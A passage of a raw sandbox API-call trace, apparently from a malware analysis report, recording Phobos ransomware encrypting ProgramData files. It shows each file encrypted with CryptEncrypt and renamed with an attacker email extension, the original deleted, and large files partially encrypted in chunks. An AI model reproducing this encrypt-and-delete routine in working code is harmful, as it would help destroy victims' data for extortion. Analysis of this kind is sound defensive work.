dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.344] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.344] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.344] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x15e, lpOverlapped=0x0) returned 1 [0178.345] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.345] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.346] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.346] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.346] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.346] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.346] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.346] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.346] CloseHandle (hObject=0x180) returned 1 [0178.346] CloseHandle (hObject=0x140) returned 1 [0178.346] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn")) returned 1 [0178.392] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0178.393] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1012025) returned 1 [0178.393] CloseHandle (hObject=0xb8) returned 1 [0178.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 0x20 [0178.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0178.394] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.394] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0178.394] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c28) returned 1 [0178.394] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.395] ReadFile (in: hFile=0xb8, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf7139, lpOverlapped=0x0) returned 1 [0178.982] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf7140, dwBufLen=0xf7140 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf7140) returned 1 [0178.994] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf7140, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf7140, lpOverlapped=0x0) returned 1 [0179.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0179.020] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0179.020] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0179.020] CryptDestroyKey (hKey=0xa32c68) returned 1 [0179.020] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0179.020] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.020] CloseHandle (hObject=0xb8) returned 1 [0179.020] CloseHandle (hObject=0xb4) returned 1 [0179.020] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 1 [0179.028] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0179.028] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0179.028] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=997054) returned 1 [0179.028] CloseHandle (hObject=0xb4) returned 1 [0179.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0179.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.029] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0179.029] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0179.029] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0179.029] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0179.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c28) returned 1 [0179.228] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0179.228] ReadFile (in: hFile=0xb4, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf36be, lpOverlapped=0x0) returned 1 [0179.400] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf36c0, dwBufLen=0xf36c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf36c0) returned 1 [0179.412] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf36c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf36c0, lpOverlapped=0x0) returned 1 [0179.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0179.428] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0179.428] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0179.428] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.428] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0179.428] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.428] CloseHandle (hObject=0xb4) returned 1 [0179.428] CloseHandle (hObject=0xb8) returned 1 [0179.428] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 1 [0179.436] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0179.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0179.436] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=654) returned 1 [0179.436] CloseHandle (hObject=0xb8) returned 1 [0179.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm")) returned 0x20 [0179.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0179.437] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0179.437] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0179.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0179.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0179.495] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0179.495] ReadFile (in: hFile=0xb8, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x28e, lpOverlapped=0x0) returned 1 [0179.496] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x290, dwBufLen=0x290 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x290) returned 1 [0179.496] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x290, lpOverlapped=0x0) returned 1 [0179.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0179.497] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0179.497] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0179.497] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0179.497] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0179.497] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.497] CloseHandle (hObject=0xb8) returned 1 [0179.497] CloseHandle (hObject=0xb4) returned 1 [0179.497] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm")) returned 1 [0179.499] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0179.499] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0179.499] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5800228) returned 1 [0179.500] CloseHandle (hObject=0xb4) returned 1 [0179.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0179.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0179.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0179.535] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0179.535] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0179.535] ReadFile (in: hFile=0xb4, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0179.619] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x1d8061, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0179.619] ReadFile (in: hFile=0xb4, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0180.065] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x548124, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0180.065] ReadFile (in: hFile=0xb4, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0180.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32aa8) returned 1 [0180.259] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0180.259] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0180.265] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.265] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0180.265] WriteFile (in: hFile=0xb4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0180.308] SetEndOfFile (hFile=0xb4) returned 1 [0180.308] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x548124, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.308] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.310] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x1d8061, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.310] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.313] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0180.313] WriteFile (in: hFile=0xb4, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0180.314] CloseHandle (hObject=0xb4) returned 1 [0180.315] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0180.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0180.315] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5204382) returned 1 [0180.315] CloseHandle (hObject=0xb4) returned 1 [0180.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0180.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: 